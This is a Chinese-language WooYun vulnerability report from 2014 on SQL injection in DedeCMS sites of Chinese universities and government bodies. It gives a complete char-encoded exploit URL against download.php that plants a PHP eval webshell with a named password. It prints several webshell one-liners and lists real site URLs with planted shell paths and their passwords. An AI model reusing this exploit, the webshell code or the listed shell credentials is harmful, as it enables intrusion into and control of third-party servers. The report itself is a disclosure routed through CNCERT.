当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079046

漏洞标题:十个政府大学网站沦陷成为马场

相关厂商:政府教育机构

漏洞作者: 路人甲

提交时间:2014-10-13 10:50

修复时间:2014-11-27 10:52

公开时间:2014-11-27 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-16: 厂商已经确认,细节仅向厂商公开
2014-10-26: 细节向核心白帽子及相关领域专家公开
2014-11-05: 细节向普通白帽子公开
2014-11-15: 细节向实习白帽子公开
2014-11-27: 细节向公众公开

简要描述:

十个政府大学网站存在SQL注入漏洞导致Getshell,在检测的过程中发现了诸多网站早已被种植木马

详细说明:

1.前段时间看到某个报道说90%的Dedecms系统都存在漏洞,60%的Dedecms系统都可以Getshell,趁着十一假期放假,写了个脚本检测了一下
脚本的原理分两部分:
1.1 直接使用download.php注入,看能否得到shell。
检测原理参见http://zone.wooyun.org/content/4261

http://www.xxxxxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96


访问http://www.xxxxx.org/plus/mytag_js.php?aid=1117
生成一句话木马.
菜刀连接 http://www.xxxxxxxx.org/plus/mybak.php 密码 mybak
1.2 由于Dedecms站点被Getshell大部分是工具扫描的,所以我们可以通过检测常见一句话木马文件来判断网站是否被攻陷。收集互联网上常用download.php注入利用工具生成的一句话木马文件名(比如鬼哥的程序生成的是90sec.php ),并从已经Getshell的网站中查找一句话文件名,例从1.1中拿下的网站中可以找到如下常见一句话程序
/plus/mainbak.php <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["k8"]); ?>
/plus/windos.php <?php assert($_POST[mgwl523]) ?>zozk
/plus/baidu.php <?php eval($_POST[xinsui]);?>VIP
/plus/e7xue.php <?php eval($_POST[e7xue]);?>www.e7xue.com
/plus\xsvip.php <?php eval($_POST[xinsui]);?>xinsui
对可疑Dedecms站点,检测是否存在上面这些文件,进而判断是否被Getshell
综上两种方法,发现下列站点存在Getshell的漏洞,而且大部分都已经沦为马场,诸多黑客留下了木马

http://library.upc.edu.cn/plus/qf.php cmd 中石油大学
http://www.guanglicn.com/plus/mybak.php mybak 广利集团
http://xcb.nedu.edu.cn/plus/mybak.php mybak
http://tjnhzx.gov.cn:808/plus/mybak.php mybak 天津政协
http://gs.njust.edu.cn/plus/mainbak.php k8 南京理工研究生院
http://jpn.bfsu.edu.cn/plus/06sec.php 6 北京外国语
http://ieer.uibe.edu.cn/plus/06sec.php 6 对外经贸大学
http://pyb.hfut.edu.cn/plus/06sec.php 6 合肥工业大学研究生院
http://www.gct-me.com.cn/plus/06sec.php 6 中国工程硕士网
http://www.haaysbb.gov.cn/plus/90sec.php guige 安阳市
http://library.upc.edu.cn/plus/qf.php 众多木马已成马场

马场.jpg


马场2.jpg


马场3.jpg


马场4.jpg


马场5.jpg


马场6.jpg


马场7.jpg


马场8.jpg


漏洞证明:

马场.jpg


马场2.jpg


马场3.jpg


马场4.jpg


马场5.jpg


马场6.jpg


马场7.jpg


马场8.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-16 15:02

厂商回复:

最新状态:

暂无